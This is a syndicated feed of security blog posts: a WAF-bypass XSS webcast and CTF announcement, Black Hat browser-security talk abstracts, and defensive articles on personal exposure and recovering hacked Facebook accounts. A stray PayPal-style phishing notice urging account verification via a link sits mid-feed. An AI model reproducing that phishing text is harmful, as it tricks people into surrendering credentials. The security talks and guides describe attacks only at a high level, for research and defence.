ad

Hacking and Cracking

Hacking and Cracking


Bypassing Modern WAF's Exemplified At XSS (Webcast)

Posted: 03 May 2016 02:41 PM PDT



Past Saturday, I conducted a "Webcast" on "Garage4hackers" on one of my favorite subjects in the field of Information Security i.e. "WAF Bypass". Initially, i had decided to present something on the topic of "Mobile Browser Security" due to the fact that this has been a topic I have been recently conducting a research on.

However i later realized that the "TakeAways" would not be much helpful, therefore i decided to talk about something that Bughunters/Pentesters can use in their day to day pentests and security engagements and hence i decided to present on this topic.

I must admit that the response has been overwhelming along with it, i have also managed to get a chance to learn more from the feedback and CTF responses.

I would like to specially thank "ImdadUllah", "Himanshu", "Sandeep"  along with other garage4hackers members for inviting/supporting me through out the journey.  One of the best things "G4H Community" is the work they are doing for the security community by conducting free of cost Webcasts. You can find a list of other Webcasts here - "http://www.garage4hackers.com/ranchoddas/"

Abstract

It is known that over the years, a trend that addresses the information security landscape has emerged, I mean, web applications are under attack, given this perspective, Web Application Firewalls are becoming increasingly popular, which are most commonly used by organizations to protect against various attacks such as SQL Injection, XSS etc.

While WAF's may help preventing application layer attacks up to some extent, however they certainly are not replacements for input validation and secure coding practices due to the fact that they are based upon Blacklists which means rejection of known patterns while allowing everything else. The problem, especially in case of JavaScript is that it's simply not possible to create blacklists capable of blocking all patterns without having to generate false positives due to the dynamic nature of javaScript and infinite ways of obfuscating the payload.

In this webinar, the we will talk about various techniques that can be used to bypass WAF"s such as Brute Forcing, Regular expression reversing and browser bugs. The webinar would mostly discuss

Prerequisite

- Basic knowledge about HTML/JavaScript

- Basic know how about XSS attacks

Webcast 


 

CTF Competition

After the webinar, we had this "CTF" challenge made up by a friend of mine "FileDescriptor", certain parts the first two challenges are based upon characteristics of a real world WAF that I encountered in wild which was combined with FD's ideas to make up the challenge . The last challenge is based upon "@FileDescriptor" unqiue idea and hence, it's not easy to crack and hence we named it as "Hard".

CTF Link :http://92.222.71.224

Hacking and Cracking

Hacking and Cracking


Bypassing Browser Security Policies for Fun and Profit (Full Presentation Video)

Posted: 21 Apr 2016 11:02 AM PDT


Blackhat has just recently released the full video for my talk on the subject of "Browser Security", If you wish to read the Whitepaper/Slides and SOP Test Suite, you can refer to my previous post on "Bypassing Browser Security Policies For Fun And Profit"


Abstract

Mobile browsers in comparison to desktop browsers are relatively new and have not gone under same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that would work under all circumstances. This leaves us with the "other" category of Client Side attacks. In this presentation, we will present our research about bypassing core security policies implemented inside browsers such as the "Same Origin Policy," and "Content Security Policy," etc. 

We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research such as Address Bar Spoofing, Content Spoofing, Cross Origin CSS Attacks, Charset Inheritance, CSP Bypass, Mixed Content Bypass, etc., as found in Android Browsers. We will also talk about the testing methodology that we used to uncover several android zero days. Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers, and in Android WebView itself.

 We will explain the root cause of the bug and demonstrate their exploitation, show examples of vulnerable code and, where possible, patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web/browser.

Hacking and Cracking

Hacking and Cracking


How Much Do Hackers Know About You?

Posted: 13 Apr 2016 07:07 AM PDT


The threat of black hat hackers has never been greater than now, considering the increasing organization of their efforts to make a dollar off of your digital assets and information. The common portrayal of the hacker is someone who knows enough about programming and the internet that they can seemingly access any information or know anything about anyone.

This is mostly an exaggeration. Finding information on someone is still work, sometimes very time-consuming and usually not worth the effort from a financial standpoint unless done on a large scale. It does beg the question, however, of how much hackers might know about you. Based on the trails you leave online and who you trust your information with, a hacker might already have a file with your name on it. It is a question worth investigating.


The answer is different for every person. Here are some factors you need to take into consideration:

Public Network Usage

How often do you use dangerous public networks to conduct online transactions or communicate with others? If you use them at all without protection, you leave yourself open to data interception. Hackers will often hang out in cafes or other public places with WiFi and use a "sniffing" device to take in the traffic of anyone unfortunate enough to be sending and receiving data over the network. Think back to what you've sent over a public network. Anything you sent or received could very well be in the hands of a hacker.

The best way to protect yourself on a public network (other than not using it) is to equip your device with a strong Virtual Private Network (VPN). A VPN will connect your device to an offsite secure server via an encrypted connection, allowing you to keep your information a secret from anyone hoping to look on. As an added benefit, your IP address will be masked by that of the offsite server, so you will be able to avoid tracking in that manner as well.

Large Scale Data Breaches

Do you know if your information has been leaked in a large scale data breach such as the Office of Personnel Management attack or the Target credit card scandal? If so, you might not have been immediately targeted for an attack, but it doesn't mean that the information has vanished from the internet. For the right price, that data (or large sets of data containing your information at a wholesale price) could be sent to an interested party. Some might not apply anymore, but with the right information, you could be traced.

To prevent this sort of thing in the future, the most you can do is choose the right organizations to trust your information to. Try to lobby for stronger standards of cybersecurity with the businesses you use and the government. You can't control organizations, but you can control who you trust.

Has One Account Been Compromised?

Much like dominoes, the breach of even one of your accounts can lead to a loss of other accounts linked to it or sharing data. Try to imagine what would happen if someone else had access to your email account. They would likely need only an hour to completely ruin your online life, should they want to. One social media account breach could easily lead a hacker to copy all of your conversations and scan them for private information. They might not even read it until the time is right to scam or blackmail you.

Think back and ask yourself if even the most minor of your accounts has been compromised. If so, ask yourself how long ago the incident took place. Look more into the data you could have lost at that time and whether it still is relevant today (some will be). Remember that in addition to financial information, the names of friends and family members could be linked with your accounts.

What Do You Keep on Your Computer?

Much of what black hat hackers do involves malware and using it to gain information on you. While some malware acts more like ransomware or a portal to let other malware in, other malware (or the same malware as a secondary measure) collects whatever information it can from you and sends the data on to its creator or owner.

If you've ever been the victim of malware, a lot of what you keep on your computer could be known by a hacker. Make sure that you try to avoid shady websites and use the best tools you can such as a high quality security suite to keep malicious programs off of your precious devices.

Privacy and Social Media Presence

Even if you keep your social media accounts safe, a hacker could use them to find out important information about you. Privacy is important to fend off malevolent hackers in a world of sharing.

Consider the following:

  • If you tag your location in a public post often enough, they might be able to get a general idea of your routine.
  • If you don't make your accounts as private as possible, a clever hacker might be able to use your public communications with your friends against you and deduce some of your movements and activities.
  • Even things such as the time of day you post can say a lot about you. A skilled hacker can use even the most basic information such as this to help build a plan to scam you better.
  • Doing a quick Google search of yourself online is a great way to determine how private you are online. If you can find it out through Google, have no doubt a hacker can find out the same information.

This is clearly a difficult question to answer for certain, but hopefully by this point you have a better idea of what to look out for and what a hacker could know about your personal life and what information they could have. You aren't defenseless, but further vigilance regarding all of your online activities is required.

Do you think there are any other factors to consider when trying to figure out how much a hacker could potentially know about you? Are there any other tools and methods of protections you would recommend? Please leave a comment below with your thoughts on the matter to continue this conversation.

About The Author

Cassie is a cyber security enthusiast who writes for "SecureThoughts" who understands that hackers will do anything they can to get information on anyone they can. The more you know, the better you can protect yourself, and ultimately that is her goal, to help others learn how to best protect themselves. 

Hacking and Cracking

Hacking and Cracking


Bypassing Browser Security Policies For Fun And Profit (Blackhat Asia 2016)

Posted: 31 Mar 2016 11:52 AM PDT



Few hours back, i delivered a talk at Blackhat Asia 2016  on "Bypassing Browser Security Policies For Fun And Profit", the talk covered wide variety of topics starting from SOP bypasses, CSP bypass so on and so forth. Due to limited time i was only able to cover few topics, however, you can find rest of the topics in the WhitePaper below. The following was the abstract:


Abstract


'Mobile browsers in comparison to desktop browsers are relatively new and have not gone under same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that would work under all circumstances. This leaves us with the "other" category of Client Side attacks. In this presentation, we will present our research about bypassing core security policies implemented inside browsers such as the "Same Origin Policy," and "Content Security Policy," etc. 

We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research such as Address Bar Spoofing, Content Spoofing, Cross Origin CSS Attacks, Charset Inheritance, CSP Bypass, Mixed Content Bypass, etc., as found in Android Browsers. We will also talk about the testing methodology that we used to uncover several android zero days.

Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers, and in Android WebView itself. 

We will explain the root cause of the bug and demonstrate their exploitation, show examples of vulnerable code and, where possible, patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web/browser'


WhitePaper


  


To download the Whitepaper, please click here.

Slides


To download the Whitepaper, please click here.

SOP Bypass Mini Test Suite v 1.0 Beta


As promised in my talk, i will make the test suite available on my blog, This test suite contains over 40 different test cases that have proven to work with different mobile browsers in my research or testing Same Origin Policy bypass issues with browsers. Due credits were given to the researchers whose Proof of concepts have been incorporated in this test suite. Please note that, this is just the beta version, the next version would have more test cases and we will try to automate the execution and results of all the test cases.

To download the SOP Bypass Mini Test Suite, please click here.

Shall you have any questions, feel free to ask. 

Notice of Policy Updates

PayPal

Dear Client,
We have noticed that some data from your account information incomplete seems inaccurate or unverified. You have to check your information in order to continue using our service smoothly, please check your account information by clicking the link below.


| Help | Contact | Fees | Security | Apps | Shop | Ebay | Secure


If you need help or have any questions, call us at 65-6510-4584, 7:00 WIB to 21:00 WIB from Monday to Friday, 8:00 WIB to 17:00 WIB from Saturday to Sunday

Hacking and Cracking

Hacking and Cracking


Facebook Account Hacked! What To Do Now?

Posted: 17 Jan 2016 09:12 PM PST


Every single day i get emails in my inbox and on my facebook page from users querying about how to recover hacked facebook account and a common problem i see in all of them is that they are proactive. Everyone searches for Facebook account recovery softwares, Facebook hacking softwares and recovery mechanisms after their facebook or any other email account has been hacked. In this article, Gary suggests methods to identify if your computer or email account has been hacked and methods suggesting what you can do after your facebook account has been hacked.

In today's digital world, it is unfortunately not uncommon for an account or machine to become compromised by an attacker for nefarious purposes. During your searches for a step-by-step solution, your frustration may hit the breaking point, as you scroll through page after page, listing preventative measures that it may already be too late for. No problem. In today's article I will outline simple strategies that should get you back in control of your online accounts and devices after a breach is suspected or confirmed. These instructions will be laid out in a manner that should be quite easy for an average user to comprehend and execute. But first, let's take a minute to understand exactly how this probably happened in the first place.

NOTE: If you are potentially dealing with this situation right now, please skip ahead to the " What do I do?" section of this article, first. Then be sure to read the rest.

Did I Get Hacked?

You're browsing around online and suddenly your friends on social media are asking you what these links you keep sending them are, or perhaps your password to an online account has been changed, emails are being sent from your email account, or there is just something strange in your activity log. Do any of these mean that your account has been compromised?

First of all, always assume your account and system have been compromised and take the appropriate measures to secure them, when in doubt. Do not let an attacker maintain a foothold and continue masquerading as you and/or stealing your sensitive data and files, while you come up with excuses to justify unfamiliar activity. Also, while many online services and accounts have a 'connected devices', 'location information', or 'login activity' viewer in their settings, this should never be advised as a sure-fire way to rule out being hacked. There are many ways that these features can be rendered useless - malware can be installed on the user's machine which sets up an HTTP or SOCKS proxy on the machine of the user, session cookies can be stolen, and even the online account settings themselves can be manipulated or even flawed to cover malicious activity. Secure your accounts and system, anyway, just to be safe. It may be time consuming, but it is far better than waiting around for something bad to happen.

How Does This Happen (Methods To Hack Facebook Account)?

There are many methods which attackers deploy to breach online accounts of their victims. This is not meant to be an instruction manual or even a comprehensive list of every way an attacker can possibly compromise your system, accounts, and/or online services. This is just an overview of the most common real-world techniques that are actually being deployed. If you've been hacked, chances are good that it was done by a combination of the techniques listed below.

There are Man-In-The-Middle Attacks which capture data packets from the victim machine and store them, before sending them along to the proper destination. There's Phishing, where an attacker convinces you to sign in to your account via a fake login page, then steals your credentials. Sometimes websites themselves are hacked via sql injection methods that dump the entire database of usernames and password hashes… these same username/password combinations are then attempted on many various sites, since a lot of users use the same login credentials across many websites and services. Then there is potentially the most dangerous… malware can be installed on the victim machine which can do anything from logging keystrokes, to remotely browsing the filesystem, to opening a remote shell, or even spying on the users via their webcams and microphones.

The malicious hacker's toolbox of techniques is always evolving and changing to meet changes in security practice and while there are other ways accounts can be compromised, most real-world hacks are a combination of some of the techniques listed above.

"What Do I Do?"

I would like to divide this into three sections, as each are important. Secure Your Accounts and Services, Secure Your Machines and Devices, and Damage Control. You don't know for sure how much of a foot-hold an attacker has or how long they have had it, before you realized or became suspicious. So assume everything has been compromised and secure each of them, as they may be used by an attacker to later re-compromise what you have secured.

Secure Your Facebook Accounts and Online Services

You must change the passwords to all your online accounts and services that you use. Even the ones that you don't recall using sensitive data on. This practice should obviously be prioritized, beginning with the account that you notice suspicious activity on.

Then quickly change your associated email accounts, as these can usually be used to reset the passwords to your other accounts. Be sure to 'logout active sessions' or connected devices, if your service has this feature. If so, you will probably be asked or prompted with it, during the password reset process.

Do not use the same passwords across different sites or services. Go to the security settings of each site or service and activate every notification you possibly can for login attempts and activity Enable two-factor authentication. Make it a pain in the ass to login if you must. Remember that ease of use and convenience are simply open doors for many others.

Then, after you have secured your devices, go through and do a final sweep of password changes. This final step is due to the fact that, if malware is installed on your device, an attacker could potentially be watching you change all your passwords the first time.

Also, follow your website, social media, or other online service's specific guidelines for reporting unusual behavior and securing your accounts. They most likely have a staff that deals with these situations on a daily basis, are usually very polite and helpful and there should never be any negative consequences if you are in error in your reporting of a hacked account.

Secure Your Devices

We must next purge your devices of any malicious processes. There are usually many free antivirus solutions that do a great job at eliminating these threats in a simple scan, but don't be scammed by a fake. Do your research for the latest, well known and best free or paid (depending on your budget) anti-malware solution. Read third party reviews.

Now, I know that anti-virus protection is not always a 100% solution, as there are many obfuscation and crypting methods that can be used to hide malware signatures from antivirus scans, but the big antivirus companies are very competitive and new definition updates roll out on a regular basis. At the time of writing this, the average private crypts are only FUD (fully undetectable) for approximately one month and the average public crypts which actually are FUD (most are never FUD, from the beginning) are only so for about one or two weeks.

While an anti-virus scan will most likely eliminate the threats on your PC, it is still advised that you backup your important files and data, format your hard drive and reinstall your operating system. For devices other than PC, follow your manufacturer's guidelines for resetting your device to default factory settings.

Damage Control

An often overlooked aspect of securing your accounts and services, is what to do afterward. It is a bit important, because you may not know what messages have been sent to others or what was done in your name.

Financial services should be your first concern. Check your account activity for any purchases you do not recognize. Be sure to call your bank or credit card companies and have new card numbers issued.

As for social media, don't be embarrassed or ashamed to post a public announcement, for everyone to see. Most everyone has seen social media accounts having been taken over by an attacker or bot and posting malicious links all over the internet, already. These things happen all of the time. This is nothing new and people will not think of you as being stupid or view you in a different light. They will instead judge you based on your quick and calm ability to assess and take control of the situation, most likely awarding you with support and respect.

For formal or social media accounts, a statement like this should be sufficient:

"Hello Everyone. I have an important and unfortunate announcement to make. It appears that some of my accounts were compromised (hacked). I noticed suspicious activity on (date XX/XX/XX ) and while I am actively securing everything and the damage seems minimal, there's no way for me to know the full extent or length of time of the breach. If you noticed any suspicious activity from my account or strange messages, please inform me immediately. Also if you have gotten any links from "me" recently, do not follow them. Instead ask me about them after I have finished securing all of my accounts, devices and services. I appreciate your support. Have a great day, everyone and apologies if there has been any inconvenience."

A shorter version:

"One of my accounts was recently hacked. Things seem fine so far. I'm now securing it. Be sure to let me know of anything suspicious from my account. Thanks."

And last, but not least: prevention. This could've saved you a lot of effort and grief to begin with. Keep up to date with the latest security practices for all of your online services, all your accounts, and all of your devices, because often a foothold into one of these can allow access into others.





About the Author


My name is Gary Lewis. While I am not as knowledgeable and skilled as many of your programming and security experts and teachers are, I do have real-world experience. There are a lot of technical skills that I'm not an expert at, but I was involved in a lot of things I will not list here and I do know how hacks are being done in the real world, rather than textbook knowledge. I retired from that scene some time ago and decided to pursue philosophy, art, and poetry. Currently, I am working on 3 series of dark themed art and poetry books entitled Paradoxium, Inevitum, and Relativium about Chaos, Order, and Time. I still stay up to date on data security and am happy to write an article for my good friend Rafay, when he wishes, but my days of hacking are over. So if you have any questions or inquiries, please refer to him and his team. They are very knowledgeable in their field of study.